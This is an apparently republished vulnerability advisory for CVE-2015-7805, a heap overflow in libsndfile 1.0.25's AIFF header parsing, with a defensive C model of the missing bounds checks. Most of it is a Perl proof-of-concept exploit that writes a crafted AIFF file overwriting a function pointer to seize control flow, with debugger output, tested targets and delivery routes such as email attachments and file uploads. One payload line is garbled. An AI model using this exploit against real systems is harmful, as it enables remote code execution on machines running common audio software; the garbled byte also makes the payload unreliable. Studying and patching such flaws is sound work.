Libsndfile Heap Buffer Overflow Vulnerability (CVE-2015-7805)
Release date:
Updated on:
Affected Systems:
libsndfile libsndfile 1.0.25
Description:
CVE (CAN) ID: CVE-2015-7805
libsndfile is a C library for reading and writing sound files through a common interface.
libsndfile 1.0.25 does not properly validate the headindex value while parsing an AIFF file header. A remote attacker who supplies a crafted AIFF file can control the index value and overwrite heap memory through memcpy.
Source: Marco Romano
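The indexing mistake described above, modelled in C as an added example: this is not libsndfile's code or the advisory author's, and the hdr_t struct, the hdr_* functions and the 64-byte buffer are this example's own stand-ins for SF_PRIVATE, header_read and SF_HEADER_LEN. The model keeps a fixed header buffer with a read cursor (headindex) and a fill mark (headend), moves the cursor by chunk sizes taken from the file the way an IFF/AIFF chunk walker does, and shows the bounds check that a memcpy from header + headindex needs before it runs. A constructed well-formed header parses; a constructed header whose chunk size field is 0x36B0 (the item count the advisory's last COMT chunk carries) is rejected instead of moving the cursor outside the buffer.

```c
/* Added example: a model of a buffered header with a read cursor (headindex)
 * and a fill mark (headend), plus the bounds checks the cursor needs.
 * Names and sizes are this example's own, not libsndfile's. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define HEADER_LEN 64   /* stand-in for SF_HEADER_LEN; small so the demo is readable */

typedef struct {
    unsigned char header[HEADER_LEN];
    int headindex;   /* next byte to hand to the parser */
    int headend;     /* one past the last byte actually buffered */
} hdr_t;

/* Is a read of `bytes` at the current cursor entirely inside the buffered data? */
static int hdr_read_ok(const hdr_t *h, int bytes)
{
    if (bytes < 0 || h->headindex < 0 || h->headindex > h->headend)
        return 0;
    return bytes <= h->headend - h->headindex;   /* both operands < HEADER_LEN, no overflow */
}

/* Bounds-checked read: copies only when the whole span is buffered. */
static int hdr_read_checked(hdr_t *h, void *out, int bytes)
{
    if (!hdr_read_ok(h, bytes))
        return -1;
    memcpy(out, h->header + h->headindex, bytes);
    h->headindex += bytes;
    return bytes;
}

/* Advance the cursor by a length taken from the file (a chunk size).
 * Trusting this value is the lever the advisory describes; the checked form
 * refuses to move the cursor outside the buffered region. */
static int hdr_skip_checked(hdr_t *h, uint32_t n)
{
    if (n > (uint32_t)(h->headend - h->headindex))
        return -1;
    h->headindex += (int)n;
    return 0;
}

static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Walk IFF-style chunks (4-byte id, 4-byte big-endian size, payload).
 * Returns the number of chunks parsed, or -1 if a chunk would push the
 * cursor past the buffered header. */
static int hdr_walk_chunks(hdr_t *h)
{
    int count = 0;
    while (h->headindex < h->headend) {
        unsigned char id[4], sz[4];
        if (hdr_read_checked(h, id, 4) < 0 || hdr_read_checked(h, sz, 4) < 0)
            return -1;
        if (hdr_skip_checked(h, be32(sz)) < 0)
            return -1;   /* hostile size: would have moved headindex out of range */
        count++;
    }
    return count;
}

/* Load a constructed header image into the model. */
static void hdr_load(hdr_t *h, const unsigned char *data, int len)
{
    memset(h, 0, sizeof *h);
    if (len > HEADER_LEN) len = HEADER_LEN;
    memcpy(h->header, data, len);
    h->headindex = 0;
    h->headend = len;
}

/* Constructed samples (not real AIFF files): two well-formed chunks, and a
 * header whose second chunk claims 0x000036B0 bytes, far past the buffer. */
static const unsigned char GOOD_HDR[] = {
    'C','O','M','M', 0,0,0,4, 1,2,3,4,
    'S','S','N','D', 0,0,0,2, 9,9,
};
static const unsigned char BAD_HDR[] = {
    'C','O','M','M', 0,0,0,4, 1,2,3,4,
    'C','O','M','T', 0,0,0x36,0xB0,
};

int demo_good(void) { hdr_t h; hdr_load(&h, GOOD_HDR, sizeof GOOD_HDR); return hdr_walk_chunks(&h); }
int demo_bad(void)  { hdr_t h; hdr_load(&h, BAD_HDR, sizeof BAD_HDR);  return hdr_walk_chunks(&h); }

/* A cursor already past headend must make every read fail, even a 1-byte one. */
int demo_cursor_out_of_range(void)
{
    hdr_t h;
    hdr_load(&h, GOOD_HDR, sizeof GOOD_HDR);
    h.headindex = h.headend + 4;
    return hdr_read_ok(&h, 1);
}

int main(void)
{
    printf("well-formed header: %d chunks\n", demo_good());
    printf("hostile header: %d\n", demo_bad());
    printf("cursor past end readable: %d\n", demo_cursor_out_of_range());
    return 0;
}
```

The check that matters is the one in hdr_read_ok: the cursor must be validated against the amount of data actually buffered (headend), not only against the buffer's allocated size, and the size field of every chunk must be validated before it is added to the cursor. Either check alone leaves a path by which a file-controlled value positions the memcpy outside the buffer.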
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/env perl
#
# Exploit Title: libsndfile <= 1.0.25 (latest version) Heap overflow
# Date: 07 Oct 2015
# Exploit Author: Marco Romano @nemux_
# Vendor Homepage: http://www.mega-nerd.com/libsndfile/
# Version: <= 1.0.25
# Tested on: Ubuntu 15.04 / OS X El Capitan 10.11
#
####################################################################
#
# Author: Marco Romano (@nemux_) - 07 Oct 2015
#
# PoC for libsndfile <= 1.0.25 (latest version) Heap overflow
#
# Run ./poc.pl to make the nemux.aiff file. Now it can be delivered in different ways.
#
# Possible attack vectors:
# - Firefox (on Linux) -> SWF/Audio play -> pulseaudio -> libsndfile ?? (not tested)
# - Email attachment
# - TCP socket connection (for audio server only)
# - File upload (ex. server side audio file manipulation, interactive voice responder)
# - Etc...
#
# -----------------------------------------------------------------------------
# [*] Affected products: all products using libsndfile (a non-exhaustive list below)
#
# [-] PulseAudio - http://www.freedesktop.org/wiki/Software/PulseAudio/ (TESTED)
#     Installed by default on most Linux environments with libsndfile too (ex.: Ubuntu, Debian)
# [-] Jack Audio Connection Kit - http://www.jackaudio.org (TESTED)
#     Available for Linux, Win, OSX (list of applications: http://www.jackaudio.org/applications)
# [-] Adobe Audition - http://www.adobe.com/products/audition.html (TESTED)
# [-] Audacity - http://www.audacityteam.org/ (TESTED)
# [-] Asterisk eSpeak Module - https://zaf.github.io/Asterisk-eSpeak/ (not tested)
#
# Run an "apt-cache rdepends libsndfile1" to see other interesting dependencies
# Searching around I found that the library is widely used in iOS and Android projects too
# -----------------------------------------------------------------------------
# [*] libsndfile web site references
#
# [-] http://www.mega-nerd.com/libsndfile/
# [-] https://github.com/erikd/libsndfile.git
# [-] https://en.wikipedia.org/wiki/Libsndfile
#
# Note: (Wikipedia reports that the LAME encoder depends on libsndfile too,
#        but I didn't find this dependency ...)
##############################################################################
#### The vulnerability is based on the wrong management of the headindex and headend values.
#### While parsing a specially crafted AIFF header the attacker can manage the index values
#### in order to use memcpy(...) to overwrite heap memory.
##############################################################################
####
# Some parts of the source code:
#
# -- common.c:337 [*]
# ...
# #define SF_STR_BUFFER_LEN (8192)
# #define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN)
# ...
# typedef struct sf_private_tag
# {
# ...
# ...
#     /* Index variables for maintaining logbuffer and header above. */
# ...
#     int headindex, headend ;
# ...
#     /* Virtual I/O functions. */
#     int virtual_io ;
#     SF_VIRTUAL_IO vio ;
# ...
# ...
# } SF_PRIVATE ;
#
# Take a look at the source of aiff.c:
# -- git clone https://github.com/erikd/libsndfile.git
#
# src/aiff.c:403
#     while (! done) {...}
# -->
# src/common.c:
#     int psf_binheader_readf (SF_PRIVATE *psf, char const *format, ...) {}
# -->
# src/common.c:793
#     static int header_read (SF_PRIVATE *psf, void *ptr, int bytes)
# -->
# src/common.c:
#     static int header_read (...) {
#     ...
#         memcpy (ptr, psf->header + psf->headindex, bytes) ;
#         psf->headindex += bytes ;
#
#     } /* header_read */
#
# Through a specially crafted AIFF header we can
# 1 - increase and decrease the headindex value regardless of what should be its real value
# 2 - overwrite memory with arbitrary data...
#
### PulseAudio test on x86_64
#
# Starting program: /usr/bin/paplay nemux.aiff
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# RAX: 0x41414141 ('AAAA')
# RBX: 0x60d3e0 --> 0x0
# RCX: 0x610a80 --> 0x0
# RDX: 0x44444444 ('DDDD')
# RSI: 0x1
# RDI: 0x7ea
# RBP: 0x36b0
# RSP: 0x7fffffffd958 --> 0x7ffff76cfe71 (pop rbx)
# RIP: 0x41414141 ('AAAA')
# ...
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41414141
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x0000000041414141 in ?? ()
#########
##############################################################################
my $header_aiff_c = "\x46\x4F\x52\x4D" .   ### FORM and VERSION
"\x00\x00\xD0\x7C" .
"\x41\x49\x46\x43" .
"\x42\x56\x45\x52" .
"\x00\x00\x00\x04" .
"\xA2\x80\x51\x40" .
"\x43\x4F\x4D\x4D" .   ### COMM Chunk and Compression NONE (PCM)
"\x00\x00\x00\x11" .
"\x00\x01\x00\x00" .
"\x00\x00\x00\x10" .
"\xF3\x0C\xFA\x00" .
"\x00\x00\x00\x00" .
"\x00\x00\x4E\x4F" .
"\x4E\x45\x0E\x6E" .
"\x6F\x74\x20\x63" .
"\x63\x6D\x92\x72" .
"\x65\x73\x53\x65\x64\x00" .
"\x53\x53\x4E\x44" .   ### 2 SSND Chunks
"\x00\x00\x00\x40" .
"\x00\x00\x00\xAA" .
"\xBD\xC5\x58" .
"\xBD\x96\xCA\xB0" .
"\xE9\x6F\x0A\xFE" .
"\x24\xCD\x26\x65" .
"\x73\x73\x65\x64" .
"\x00\x53\x53\x4E" .
"\x44\x00\x00\x00" .
"\x40\x00\x00\x00" .
"\x00\xF8\x72\xF3" .
"\x59\xFB\x56\xFE" .
"\x00\x00\x00\x3E" .
"\xE9\x22\x66\x94" .
"\x4E\x66\x55\x94" .
"\x4E\xD4\xD7\xC5" .
"\x42\x49\x61\xC4" .
"\x43\x4F\x4D\x54" .   ### 2 COMT Chunks
"\x00\x00\x00\x26" .
"\x00\x01\x00\x20" .
"\x68\x17\x0C\x10" .
"\x25\x03\x00\x10" .   ### 0x2503 items
"\x03\x80\xFF\x37" .
"\x52\x00\x00\x00" .
"\x04\xA2\x8E\x51" .
"\x40\x43\x4F\x4D" .
"\x54\x00\x00\x0B" .
"\x26\x00\x01\x00" .
"\x20\x68" .
"\x17\x00\x10\x03" .   ### Start wrong and junk chunks (they will trigger the default block in the switch statement in aiff.c)
"\x03\x00\x10\x1B" .
"\x80\xFF\x4F" .
"\x4E\x45\x1F\x6E" .   ### my debug: heap 0x161e0d8
"\x6F\x00\x01\x00" .   ### my debug: heap 0x161e0dc
"\x00\xE4\x7F\x72" .   ###...
"\x00\x00\x00\xD7" .
"\xBA\x17\xFF\xE3" .
"\x1F\x40\xFF\x20" .
"\x18\x08\xDD\x18" .
"\x00\x28\x00\x28" .
"\x00\x28\x40\x28" .
"\x00\x28\x00\x28" .
"\x00\x28\xFF" .
"\xFF\x80\xF7\x17" .
"\x00\x18\x01\x00" .
"\x20\x68\x17\x0C" .
"\x10\x03\x03\x00" .
"\x10\x03\x80\xFF" .
"\xFF\x4F\x4E\x45" .
"\x0A\x6E\cross\x00" .   ### the byte after \x6E is garbled in the source ("\ cross") and cannot be recovered from this page
"\x18\xDE\x3A\x08" .
"\x00\x18\x21\xA6" .
"\x05\x7F\x40\x00" .
"\x08\xFF\x5D\x00" .
"\xF0\x00\x4F\x00" .
"\x6A\xFF\x89\x9D" .
"\xDA\x07\xB6\xFF" .
"\x2C\x92\xB3\x0D" .
"\xE4\x40\xBB\x23" .
"\x00\x18\x00\x38" .
"\x00\x63\x00\x28" .
"\x00\x90\xFF" .
"\x20\x18\x08\xDD" .
"\x18\x00\x28\x00" .
"\x28\x00\x5E\xFC" .
"\x78\xD9\xAD\xCD" .
"\x9E\x3E\xE9\x21" .
"\x55\x94\x4E\x85" .
"\x51\x94\x4E\xA6" .
"\xD7\xC5\x42\xA7" .
"\x2A\x55\xC4\x9F" .
"\x43\x4F\x4D\x54" .   ### here starts the next COMT chunk with 0x36B0 items
"\x08\x00\x00\x26" .
"\x00\x01\x00\x20" .
"\x68\x17\x0C\xDD" .
"\x36\xB0";   #### end of header...
my $file = "nemux.aiff";
if ($ARGV[0] eq "h" || $ARGV[0] eq "help") {
    print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n";
    print "[*] Heap overflow vulnerability\n";
    print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015\n";
    print "\nJust run " . $0 . " (output will be \"nemux.aiff\" file)\n";
    exit 0;
}
my $eax_addr = 0x41414141;
my $edx_addr = 0x44444444;
#####
#### We are going to overwrite the psf structure allocated in the heap
#####
my $content_file = pack('Q', $eax_addr);
$content_file .= "\x90" x (21146 - length pack('Q', $eax_addr));
#####
### In the psf structure we will overwrite "int virtual_io" with a true value, and the vio.seek function pointer
### with an arbitrary address.
### In this way the block below will be triggered in file_io.c:
### ...
###     if (psf->virtual_io)
###         return psf->vio.seek (...);
###
#####
my $rax_overwrite = pack('Q', $eax_addr);   ### overwrite vio.seek pointer here
my $padding = "\x43" x 24;                  ###....
my $rdx_overwrite = pack('Q', $edx_addr);   ### overwrite rdx here...
my $padding_end_file = "MOMIMANHACKERNOW" x 7;   ### not useful but funny ... -_-
print "\n[*] Making AIFF file: \"nemux.aiff\"";
my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file;
print "\n[*] Done... AIFF File Size: " . length($payload) . "\n";
print "\nIs it over? ... Hello? ... Did we win? (cit.)\n";
open(my $FILE, '>', $file) or die "Cannot open $file for writing: $!";
binmode($FILE);   # raw bytes: no newline translation on any platform
print $FILE $payload;
close($FILE);
print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity nemux.aiff\n";
print "[+] You can test it on OSX, Windows and Linux - with Adobe Audition";
print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n";
print "Marco Romano \@nemux_\n";
Suggestion:
Vendor patch:
Libsndfile
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.mega-nerd.com/libsndfile/